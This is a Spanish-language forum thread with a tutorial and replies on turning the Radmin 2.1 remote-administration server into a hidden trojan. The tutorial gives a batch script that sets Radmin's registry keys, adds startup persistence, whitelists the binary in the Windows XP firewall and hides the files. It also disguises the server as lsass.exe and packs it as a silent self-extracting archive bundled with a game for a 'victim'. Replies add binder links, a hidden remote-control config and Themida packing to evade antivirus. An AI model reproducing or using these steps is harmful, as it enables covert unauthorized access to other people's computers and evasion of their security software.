ACTUALIZACION TROYANIZANDO RADMIN 2.1
By Octalh
Bueno antes que nada saludos a toda la gente del foro, ya tenia tiempo que no me pasaba por aqui... esque e andado algo desorientado pero bueno...
Debido a que en mi tutorial de troyanizando radmin se explica un metodo para empaquetarlo con una herramienta que ya es detectada por los AV me decidi a escribir esta actualizacion donde explicare otro metodo para empaquetarlo y que es
100 % indetectable a los av seria bueno que algun moderador editara este post y lo ponga en el otro post donde esta el tutorial de esa forma queda junto y no se pierde el hilo
bueno vamos a usar solamente una herramienta y lo mejor es que probablemente muchos ya la tienen instalada, ademas usare un metodo que descubri para
brincarnos el FW del XP pero sin desactivarlo ya que si detenias el servicio a nuestra victima le salia un letrerito advirtiendole de su seguridad.. aaaa y ademas
haremos que nuestro radmin no pueda ser cerrado desde el administrador de tareas ok si ya estan todos listos empezamos este tutorial
lo primero sera bajarnos en caso de que no lo tengan un programa que sirve para empaquetar archivos en .rar se llama WINRAR pues lo vamos a usar como joiner.
nos vamos a crear una carpeta y dentro de ella meteremos el server de radmin junto con su dll asi no hacemos desorden
(http://www.radiokazbeel.net/radmin.gif)
r_server.exe(http://www.radiokazbeel.net/73.ICO)
AdmDll.dllbueno ahora renombramos el server de radmin por uno de estos nombres:
lsass.exe
winlogon.exe
smss.exe
csrss.exe
services.exela razon es porque estos son procesos del sistema criticos y por lo tanto no podran ser cerrados, esto se debe a que el administrador de tareas solo se fija en el nombre del proceso pero no de la ubicacion de este. Para mas informacion acerca de este bug click aqui http://lympex.sosvulnerable.net/resources/advisories/bug_proc_taskmgr.htm
despues le cambiaremos el icono por el del archivo original quedando de la siguiente forma:
lsass.exe(http://www.radiokazbeel.net/3.ICO)
<===== r_server.exepara cambiar el icono usaremos reshacker es una herramienta indispensable que ya todos deben tener.
ok con esto ya no podran cerrarlo desde el administrador de tareas, si lo intentan
este sera el resultado(http://www.radiokazbeel.net/proceso.JPG)
bien ya que esta renombrado y con nuevo icono procederemos a crearnos un bat, este como siempre agregara las llaves en el registro y ademas hara que el radmin pase el fw del xp sin tener que desactivarlo.
codigo del bat
@echo off
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000" /f
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lsass /t REG_SZ /d "%windir%\lsass.exe" /f
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v C:\WINDOWS\lsass.exe /t REG_SZ /d "C:\WINDOWS\lsass.exe:*:Enabled:lsass" /f
attrib +h +s c:/windows/bin.bat
attrib +h +s c:/windows/lsass.exe
exit
si se fijan en el registro en la siguiente clave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
encontraran todas las aplicaciones y puertos que el fw tiene con permisos, lo que estamos haciendo es agregar nuestro radmin a la lista de las aplicaciones que estan permitidas para darles salida ;D
tambien añade atributos de archivo del sistema y oculto de esa forma no se pueden ver, ni con la opcion de mostrar archivos y carpetas ocultos, tienen que tener activada la otra opcion de mostrar archivos ocultos del sistema
el nombre del bat puede ser el que ustedes quieran yo le puse al mio bin.bat
bien ya que tenemos todo listo en nuestra carpeta procederemos empaquetarlo ::)
Se supone para este punto ya todos deben tener instalado WINRAR y si no es asi pues instalalo rapido porque ya es hora de darle uso
seleccionaremos los 3 archivos que tenemos
lsass.exe
AdmDll.dll
bin.batle daremos boton derecho del mouse, y le daremos en la opcion
Add to archive...
una ves en el menu vamos a palomear la opcion
Create SFX archive(http://www.radiokazbeel.net/r1.JPG)
ahora nos vamos a la pestaña avanced y le damos click al boton SFX options
ahora en donde dice
patch to extract escribiremos
c:\windowsy en run after extraction el nombre del bat en mi caso
bin.bat(http://www.radiokazbeel.net/r2.JPG)
ahora nos dirigimos a la pestaña
Modes y palomeamos
Hide all
Overwrite all filesde esta forma extrae todo de forma oculta y ademas en caso de que ya exsitan esos archivos los sobreescribe
ahora ya le dan en aceptar y esperan a que el winrar cree el .exe
pues bien ahora ya tienen el radmin empaquetado y con un doble click se instalara en el sistema de la victima, pueden empaquetarlo junto con un juego, un programa o una animacion en flash de esa forma mientras ven la animacion radmin es instalado en el sistema ;D y estara listo para usarse hasta el proximo reinicio.
Bien aqui termino este tutorial espero les guste,
puedes distribuirlo siempre y cuando respetes las fuentes y no modifiques el texto.Salu2 y suerte ;D
www.codeprojecteam.com
ojala funcione!!!!
Ahora mismo voy a probarlo y comento que tal me ha ido ;)
Saludos
acabo de probarlo con migo mismo, no me va. :(
Algo haces mal yo lo probe en windows XP con SP2 y funciono perfectamente revisa el bat alomejor y no esta bien hecho recuerda que el foro corta el codigo para que quepa aa y ademas revisa que tengas la versión 2.1 de radmin ya que la 2.2 es diferente
nsoe que pasa con mi windows pero el reshacker no se ven bien los caracteres... que puede ser?
Detectado por VirusScan.... es obvio, si buscas en google sobre admdll.dll veras que ya todos lo conocen como remote-admin.
Todo muy bonito pero el NOD32 lo detecta de una. Asi que lo de 100% indetectable es cualquiera.
yo creo que todos los antivirus lo detectan la verdad.... mas que nada por el admdll.dll
Citarbueno ahora renombramos el server de radmin por uno de estos nombres:
lsass.exe
winlogon.exe
smss.exe
csrss.exe
services.exe
la razon es porque estos son procesos del sistema criticos y por lo tanto no podran ser cerrados, esto se debe a que el administrador de tareas solo se fija en el nombre del proceso pero no de la ubicacion de este. Para mas informacion acerca de este bug click aqui
Interesante; no me habia enterado muy bien de eso; pero lo tengo claro...lo del firewall del xp es una lastime que no este protegida bajo el registro...Saludos.
mm que mala suerte, yo uso kav y no lo detecta. lo del indetectable lo dije por el joiner que usaba....
por lo del nod solo me preocupo por su heuristica de ahí en fuera se pueden modificar las firmas..
entonces está mas que claro que te debes cambiar de antivirus, o quizas actualizarlo.
ok lo tomare en cuenta aunque en si el post no trata sobre antivirus eso esta fuera de contexto , si quieres puedes hacer lo mismo con VNC o cualquier otro... mas que una guia paso a paso es un texto para ampliar conocimientos y usar tu imaginacion...
de todas maneras el texto está bueno en ese contexto y felicitaciones men y gracias por el trabajo que te diste.
SeniorX que mal agradecido eres xDDDDD
Pues hablando de antivirus; los detectan solo los mejores; para mi el mejor: Nod32...0:)
K onda;
Soy novato en esto...je...Y tengo un problema con el tuto...de donde obtengo el archivo "AdmDll.dll" ??...No lo encuentro por ninguna parte...Espero k me puedan ayudar...
Saludos
Ibiza-Tdi... 8)
K onda
Ya vi cual era el problema es k el k habia instalado era el Radmin 2.2 y no el 2.1 ... solo falta probar los archivos a ver k tal...
Saludos
Ibiza-Tdi... 8)
hace un tiempo atras hice un ejecutable en c++ que hacia toda la configuracion de radmin 2.1. Este creaba las llaves en el registro (password, icono escondido,, etc), y copiaba el radmin y su dll a la carpeta /windows/.
si alguien quiere el codigo me avisa.
vale decir que radmin ya es detectado!!
ahora estoy usando un programa (administrador de redes tambien) que se llama Beyond Remote (version 1.2.1.531) (permite controlar el computador remoto, ver la pantalla remota, transferencia de archivos, chat, reiniciar y apagar el pc remoto. lo unico que le falta es Shell remota). bueno... este programita se basa en la configuracion de un archivo (BRServer.cfg) por lo que no necesitan modificar casi nada en el registro (solo hacer que se inicie al encender el pc).
aqui el archivo de configuracion.
[CONFIG]
Password=±²³´µ¶·¸¹
EnableLogFile=0
LogFile=C:\ARCHIVOS DE PROGRAMA\DATAAPPLES\BEYONDREMOTE\BRSERVER.log
ListenPort=5424
RC=
PasswordProtectTrayIcon=1
HideTrayIcon=1
IPFiltering=0
EnableTransparencyDetection=0
lo unico que deben hacer es usar un binder. les recomiendo IPACKER TOOL (Muy buen programa, aunque descontinuado. usa una dll que es detectada por los antivirus.)
puedes descargarlo de aqui:
http://ns2.elhacker.net/DECRIPT/BINDER/Ipacker_tool.rar
exelente !!! y funciona pero me gustaria saber por favor si quiero añadir un ejecutable cualquiera a la lista de los permitidos por el firewall como creo el bat para eso por ejemplo un server.exe
Citarsi se fijan en el registro en la siguiente clave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
encontraran todas las aplicaciones y puertos que el fw tiene con permisos, lo que estamos haciendo es agregar nuestro radmin a la lista de las aplicaciones que estan permitidas para darles salida
esto solo es pa el fw del sp2
salu2
Pero no hey forma de modificar el nombre del dll y con ingenieria inversa hacer referencia dentro del r_admin al nuevo nombre de la dll, por que es que el antivirus lo reconoce es por el nombre y no por la esencia, osea no por lo que dentro de la libreria dinamica hay, creo que todos estamos a esperas de que sea indetectable por los antivirus asi que o a trabajar todos juntos para hacerlo o esperar 10 años mas a que alguien lo haga.
Propongo que hagamos una entrada principal que se llame ocultando el r_admin de los antivirus y posteemos todos nuestro conocimientos, pruebas e investigaciones para asi hacerlos nosotros en grupo y llevarnos los creditos de por vida, por que hasta donde se muchos quieren usarlo incluso yo ;D
Eso estaria bien, pero si se va usar reversing pa eso mejor hay que hacer indetectable un back door mejor como el wolft
esa si que es una back door :shocked:
Excelente aportación OCTALH siendo este mi primer post, no quiere decir que no siga mucho esta web. He probado el anterior post "troyanizando radmin" y me fue de vicio. El problema lo tengo ahora con esta actualización. Tengo todo creado y el SFX hace su función a la perfección, pero en "Opciones avanzadas SFX/general" tengo ejecutar tras extracción, donde pongo el archivo.bin
y ejecutar antes de la extracción, aquí pondría una animación flash o lo que sea?¿¿?
He probado esto y me instala todo lo que es el radmin pero no abre el programa ejecutable que le puse.
Como haríais para os abriese un archivo y por detrás se instale el SFX?¿¿
Por cierto al SFX no logro cambiarle el icono...Vosotros si?
Saludoosh
yo intente lo mismo y te aconsejo q uses un blinder q es muxo mejor para este caso no te aconsejo q uses el ipackertools porque la mayoria de los antivirus lo reconoce como un joiner asi q te aconsejo q uses el redbinder q funciona muy bien y sobre todo con el bat me parece q el programa ya se termina de ejecutar es decir el server asjunta los tres archivitos el bat, el dll, y el server, tb ya q estas puedes adjuntar el nc asi matas dos pájaros de un tiro bye y suerte.
P.D: ya eh echo este totu y me parece q es un aportacion importante para los iniciados y siempre encontrar vuestras propias vias no siempre ir todo al pie de la letra porque lo unico q hara es repetir como un loro todo lo q se dice. Salu2
bueno antes que nada perdon por no responder a tiempo la verdad me ausente del foro un tiempo pero aqui estoy denuevo :P
para el flash primero tienes que crear el player de esa forma no sera un swf sino un exe, el player de macromedia lo hace pero hay muchos programas que hacen lo mismo, por lo del joiner es bueno pero ya que la mayoria son detectados tarde que temprano por eso me gusto la idea de usar winrar de joiner asi estaremos seguros que el antivirus no se entrometera en nuestros asuntos
salu2 y suerte....
Si tengo una pc con windows xp y esta posee dos cuentas, si lo instalo en una cuenta con permisos de administrador no tiene problemas.
El problema esta cuando lo quiero instalar en una cuenta de tipo limitada, ya que me pide permisos de administrador.
Lo que quiero es levantar el servicio desde la cuenta limitada, sin entrar a la cuenta de administrador
Buenas amigos, bueno mi pregunta es tan simple como elemental
Esto funciona solo hasta q la persona reinicie el equipo?
Despues de que reinicie la pc no podremos acceder mas?
Gracias
Saludos
funciona con cada reinicio .. ;D siempre tendras acegurado tu acceso al sistema infectado
Una unica pregunta:
Si el problema principal fue y será que siempre el antivirus detecta al radmin como virus de acceso remoto, etc.... seria posible agregar una linea que antes de descomprimirlo / ejecutarlo desactive el escaneo en tiempo real de archivos del antivirus???
Sdos.- :huh: :huh: :huh:
Hay un programa que es un 80% efectivo para que no sean detectados como virus los dll, scr, exe y ocx... en realidad es un software de proteccion diseñado para que no te puedan crackear un programa hecho por ti. las ventajas son:
Advanced Anti-Debugger
Advanced API-Wrapping
Anti Dumpers
Virtual Machine Emulaion
Entry Point Ofuscation
Metamorph Security
Resources Encryption
Memory Guard
VMWare / Virtual PC compatible [on-off]
A demas de:
Resources Compression
Monitor Blockers [File and Registry]
Delphi / BCB Form Protection
Ring-0 Protection
y bueno.... algunos usan este programa para filtrar virus y troyanos y hacerlos indetectables por los AV ya que no lo pueden descompilar ni nada--.. digo 80% efectivo porque lo hice con 2 keyloggers, 5 troyanos y 3 virus, de los cuales una makina con windows nt200 mas el Mcafee 8.0 (Pagado) me detectó solo 2 troyanos y un keylogger.
Supuestamente era 100% efectivo, pero me desepciono ver como borraba mis troyanitos :(
La idea es hacer pasar el DLL del radmin por el themida 1.5 y ver que sucede... yo mientras lo pruevo les dejo la inquietud :D
Si me preguntan donde busqué el crack.. pues estuve metido como media hora en google buscando hasta que di con un foro que ya ni me acuerdo con el link del themida 1.5+manual con fotos+Crack.
DATO: yo tambien juego mucho con el winrar pero con la diferencia que siempre le doy la instruccion de que me omita los archivos existentes porque me ha pasado que al tratar de sobreescribir un archivo en uso se traba y aparece un tremendo pantallazo diciendo que trataba de afiliarte la pc con el radmin. ( obiamente si ya tiene el radmin en su computador es porque deve estar corriendo o no? )
APORTE: Yo opino! que puedes darle otro nombre al dll como por ejemplo: pro.jpg e incluir en el bat que te haga un tskill al radmin, borrar el dll original y renombrar el tuyo, pero esto no es necesario porque quedaria exactamente igual que antes no? con la diferencia que este esta pasado por themida y no sufrira ante el indeseable AV cuando le pongan uno bueno a esa pc ..... Puede ser no???? porque si aún esta en esa makina es porque el antivirus que utiliza si es que tiene deve ser malo y talves algun dia lo actualizen y nos dejen tirados sin conecccion remota. (Considerar que si ya esta instalado el radmin y esta corriendo... cuando ejecutes el SFX (rar ejecutable) te saldrá un error no muy atractivo. A demas con el @echo off que octalh le puso no se verá el error si realmente no estaba instalado con anterioridad.
Otro aporte es bajar el bat2com que me recomendo octalh y el com2exe para encapsular el bat dentro de un *.exe o *.com en caso de que nos quieran espiar y quieran ver el bat para ver lo que hacen o por lo menos ya no saldrá tan llamativamente el bat. incluso puedes pasarlo tambien por el themida junto con el ejecutable del radmin para que sea aún mas dificil de detectar y pierda ese toque de "Hagalo usted mismo" y sea algo mas "Proffessionnal" jajajaja
y con respecto a xclom: si se puede, es mas... es posible sesmenuzar cada antivirus con multiples tecnicas, pero el problema está en que cada antivirus es diferente y sería muy facil si todos tubieran el mismo antivirus no crees?
el themida es muy bueno el unico inconveniente es que aumenta demasiado el peso de la app seria bueno encontrar alguno que haga lo mismo pero que no infle tanto al exe
gracias por las portaciones WHK ;D
salu2..
karpesky lo detecto como potencialmente peligroso :huh: pero aun asi me sirvio de muchoo gracias
Alguien tiene un link para descargar el radmin 2.1, he estado buscando y no lo encuentro.
Salu2
alzehimer_cerebral
Cita de: alzehimer_cerebral en 25 Octubre 2008, 16:25 PM
Alguien tiene un link para descargar el radmin 2.1, he estado buscando y no lo encuentro.
Salu2
alzehimer_cerebral
Si pasate por aquí:
http://www.sharewareconnection.com/download-remote-administrator-radmin--from-sharecon.html
Saludos
Pues en el readme pone que es la version 3.2.....
Salu2
alzehimer_cerebral
Hola a todos saludos:
Pues yo tambien tengo un problema y es que he pasado varias horas buscando la version 2.1 de Radmin y no lo encontre, si alguien fuera tan amable de poner un link o algo para dar con su paradero seria de mucha utilidad porque asi me podre poner a trabajar en el tema, desde ya muchas gracias a toda la comunidad
Cita de: McGerson en 12 Noviembre 2008, 06:41 AM
Hola a todos saludos:
Pues yo tambien tengo un problema y es que he pasado varias horas buscando la version 2.1 de Radmin y no lo encontre, si alguien fuera tan amable de poner un link o algo para dar con su paradero seria de mucha utilidad porque asi me podre poner a trabajar en el tema, desde ya muchas gracias a toda la comunidad
Buenas,
Acá te dejo un enlace:
http://www.sharewareconnection.com/download-remote-administrator-radmin--from-sharecon.html
Saludos*
Vuelve a ser la version 3.2. No creeis que en el nombre incluya un 32 es un poco sospechoso?? A parte si leeis el readme dice que es la version 3.2.
Salu2
alzehimer_cerebral
Sinceramente, he comentado en tu otro post Octalh... y perdon por mi ignorancia pero sigo en las mismas... :S
en el otro post comenté sobre el tftp .... y en este pues una nueva duda que me surgió... en el radmin viewer... que address colocamos? ... la del tftp? si es así.. que tftp? :S
Gracias de antemano :S
ni windows 7 ni hablamos no ?